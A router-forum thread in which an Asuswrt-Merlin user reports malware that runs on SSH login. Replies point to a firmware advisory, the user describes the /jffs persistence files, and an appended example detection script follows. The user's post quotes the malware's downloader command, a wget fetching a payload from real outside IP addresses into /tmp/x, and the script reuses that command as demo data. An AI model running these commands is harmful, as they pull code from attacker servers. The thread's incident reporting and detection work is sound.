Malware connecting to various IPs upon SSH login to router


sashabe

New Around Here
I have been using ASUSWRT-Merlin installed on an RT-AC86U, 384.11-2, for a couple of years. SSH login is enabled from LAN only, from a single computer (via auth key), but Web UI access has been allowed for both HTTP and HTTPS. Some other customer features have been enabled (Smart Disk, Smart Access, IPSec VPN server, TimeMachine). Nothing major was installed from third parties (e.g. Diversion, Skynet, etc.) except for Transmission. Both login and password for the router are set to non-default ones.

Yesterday I logged in via SSH and got a bunch of mostly failing commands that looked like this (a bigger file is attached containing a copy-paste list from Terminal):
Code:
--2022-07-16 13:33:03--  http://184.70.140.86:8078/H9PIVokOxv4nQdme/dlr
Connecting to 184.70.140.86:8078... connected.
HTTP request sent, awaiting response...

This happens right after SSH login, so I can't enter my own commands without quickly issuing Ctrl+C tens of times before the process stops throwing them, replacing one with another, and I can enter my own.

I tracked the renegade process down to this command in htop: /bin/sh -c wget --timeout=10 --tries=3 http://103.29.215.199:8078/H9PIVokOxv4nQdme/dlr -O /tmp/x. The "x" file is empty. But most of these connections are failing anyway.

Tried to grep the router for some source file that starts the commands, but to no avail. Also it seems as if the malware should have put something into an sh profile file that runs on SSH login, but e.g. /etc/profile seems clean.

Have you ever encountered this type of malware? How could I have prevented it as a lesson learnt? I guess I'd need to update the firmware anyway, but wasn't SSH login secure in this case?
 

Attachments

  • bash-commands-on-login.txt (6.3 KB)
I don't recognise those specific commands. But the 384.x firmwares have known vulnerabilities that have been actively exploited. Smart Disk and Smart Access (as well as remote HTTP/S access) expose services to the internet and are also known to have security issues. In other words, your current setup is highly susceptible to being hacked.

The solution is to factory reset (with initialise) your router, install the current 386.x firmware and follow that with another factory reset.

Here's just one example from Asus' Product Security Advisory.
03/25/2022 Security Advisory for Cyclops Blink
ASUS is investigating and working for a remediation for Cyclops Blink and will continue to post software update.

To help owners of these routers take necessary precautions, we compiled a security checklist:
(1) Reset the device to factory default: Log in to the web GUI (http://router.asus.com), go to Administration → Restore/Save/Upload Setting, click "Initialize all the setting and clear all the data log", and then click the Restore button.
(2) Update all devices to the latest firmware.
(3) Ensure default admin password had been changed to a more secure one.
(4) Disable Remote Management (disabled by default, can only be enabled via Advanced Settings).

Affected products

GT-AC5300 firmware = 3.0.0.4.384.xxxx or earlier version
GT-AC2900 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC5300 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC88U firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC3100 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC86U firmware = 3.0.0.4.384.xxxx or earlier version.
RT-AC68U, AC68R, AC68W, AC68P firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC66U_B1 firmware = 3.0.0.4.384.xxxx or earlier version
RT-AC3200. We advise users to reset the router and disable remote connection. New firmware will be released soon.
RT-AC2900 firmware = 3.0.0.4.384.xxxx or earlier version.
RT-AC1900P, RT-AC1900P = 3.0.0.4.384.xxxx or earlier version.
RT-AC87U (EOL)
RT-AC66U (EOL)
RT-AC56U (EOL)

Please note that if you choose not to install this new firmware version then, to avoid any potential unwanted intrusion, we strongly recommend that you disable remote access from WAN and reset your router to its default settings.

If you have already installed the latest firmware version, please disregard this notice.

Should you have any question or concerns, please contact ASUS via our Security Advisory reporting system:
https://www.asus.com/securityadvisory

For further help with router setup and an introduction to network security, please visit
https://www.asus.com/support/FAQ/1008000
https://www.asus.com/support/FAQ/1039292
Thanks for the reply @ColinTaylor! That explains it.

I'm still wondering how the malicious script managed to insert itself into SSH login (without apparently modifying the user profile config) and why.

But I will proceed with resetting and updating the router, that indeed seems to be the best way to go.
 
A bit of extra info that I've discovered after some research.

The malware creates a profile file at /jffs/etc (I had missed the fact that this file apparently wasn't there before) which calls a binary at /jffs/.config_read-X:
Code:
/jffs/.config_read-1 ; /jffs/.config_read-2 ; /jffs/.config_read-3 ; /jffs/.config_read-4

In my case it added a single file .config_read-1 to /jffs as well as a .ssh-config which is also binary.

So the profile file makes sure stuff from .config_read-X gets executed on every SSH login. Why the binary .ssh-config is present I have no idea, though.

There's no info on the web about this combo of file names, so this malware might be pretty new (or just a bit less dumb than is visible to the eye).
SSH is just one way to access the operating system.
Your router has been wide open to the world by having Web access enabled with a vulnerable firmware version.
Quite surely your router is used as a source for e.g. DDoS attacks, besides what they possibly monitored and grabbed from your own network.
Don't think that some hacker in his loft has been trying to access your router; those are automated systems that scan for open devices.
Please take the router off the net as soon as possible and fix it as described in an earlier post.
 
If you still have these files, zip them and email them to me please. I will forward them upstream to Asus for their analysis in case it's a new strain.
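The persistence chain described in the thread (a profile file dropped under /jffs/etc that runs /jffs/.config_read-N on every SSH login, plus the unexplained /jffs/.ssh-config binary, plus the wget loop seen in htop pulling .../dlr into /tmp/x over port 8078) is easy to check for before the router is wiped and the files are sent upstream. The script below is an added example written for this page; it is not code from the thread or from Asuswrt-Merlin. The function names, the --demo mode and the fake /jffs tree and ps listing it builds are this example's own constructions; the indicators are only the ones reported above.

```shell
#!/bin/sh
# Added example, not from the thread or from Asuswrt-Merlin: a hunt script
# for the persistence mechanism described above. It looks for the profile
# file dropped under /jffs/etc that chains /jffs/.config_read-N, the extra
# /jffs/.ssh-config binary, and the wget loop fetching .../dlr to /tmp/x over
# port 8078. Function and file names are this example's own; the indicators
# are the ones reported in the thread.
#
# On the router:        sh hunt.sh
# On an offline copy:   sh hunt.sh /path/to/jffs-copy
# Self-test with fakes: sh hunt.sh --demo

# Look for the dropped files in a jffs tree. Findings go to stderr, the hit
# count to stdout, so a caller can branch on the number.
hunt_jffs() {
    root=${1:-/jffs}
    hits=0
    # The profile file the malware dropped under /jffs/etc; the login shell
    # runs it on every SSH session. The thread does not give the exact
    # name, so any profile* file there is reported.
    for p in "$root"/etc/profile*; do
        [ -f "$p" ] || continue
        echo "[!] login profile present: $p" >&2
        if grep -q 'config_read-' "$p" 2>/dev/null; then
            echo "[!]   it chains /jffs/.config_read-N droppers" >&2
        fi
        hits=$((hits + 1))
    done
    # The dropper binaries and the unexplained .ssh-config file.
    for f in "$root"/.config_read-* "$root"/.ssh-config; do
        [ -e "$f" ] || continue
        echo "[!] dropped file: $f ($(wc -c < "$f" | tr -d ' ') bytes)" >&2
        hits=$((hits + 1))
    done
    echo "$hits"
}

# Read process-list text (e.g. the output of `ps w`) on stdin and report the
# downloader loop seen in htop. The C2 address rotates between posts, so
# match on the fixed parts: port 8078, the /dlr path, the -O /tmp/x target.
hunt_ps() {
    n=0
    while IFS= read -r line; do
        case "$line" in
            *wget*:8078/*/dlr*|*"-O /tmp/x"*)
                echo "[!] downloader process: $line" >&2
                n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Constructed demo data (not real artifacts): a fake /jffs tree laid out as
# the thread describes, and a fake `ps w` listing with the wget command
# from the original post plus two benign processes.
make_fake_jffs() {
    d=$(mktemp -d)
    mkdir -p "$d/etc"
    printf '%s\n' '/jffs/.config_read-1 ; /jffs/.config_read-2 ; /jffs/.config_read-3 ; /jffs/.config_read-4' > "$d/etc/profile"
    printf '\177ELF' > "$d/.config_read-1"   # stand-in for the dropped binary
    printf '\177ELF' > "$d/.ssh-config"
    echo "$d"
}

FAKE_PS='  123 admin  S  /bin/sh -c wget --timeout=10 --tries=3 http://103.29.215.199:8078/H9PIVokOxv4nQdme/dlr -O /tmp/x
  124 admin  S  /usr/sbin/dropbear -p 22
  125 admin  S  transmission-daemon -g /opt/etc/transmission'

if [ "${1:-}" = "--demo" ]; then
    fake=$(make_fake_jffs)
    j=$(hunt_jffs "$fake")
    p=$(printf '%s\n' "$FAKE_PS" | hunt_ps)
    rm -rf "$fake"
    echo "demo: $j file indicator(s), $p downloader process(es)"
elif [ -n "${1:-}" ] || [ -d /jffs ]; then
    j=$(hunt_jffs "${1:-/jffs}")
    p=$(ps w 2>/dev/null | hunt_ps)
    echo "$j file indicator(s), $p downloader process(es) found"
    [ "$j" -eq 0 ] && [ "$p" -eq 0 ] || exit 2
fi
```

A clean result from this script only means these particular indicators are absent; it does not clear a 384.x router that had Web access exposed, and the factory reset with initialise plus the 386.x update recommended above still applies. Asuswrt-Merlin also sources /jffs/configs/profile.add into the login shell, so that file is worth reading by hand on the same pass.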
 
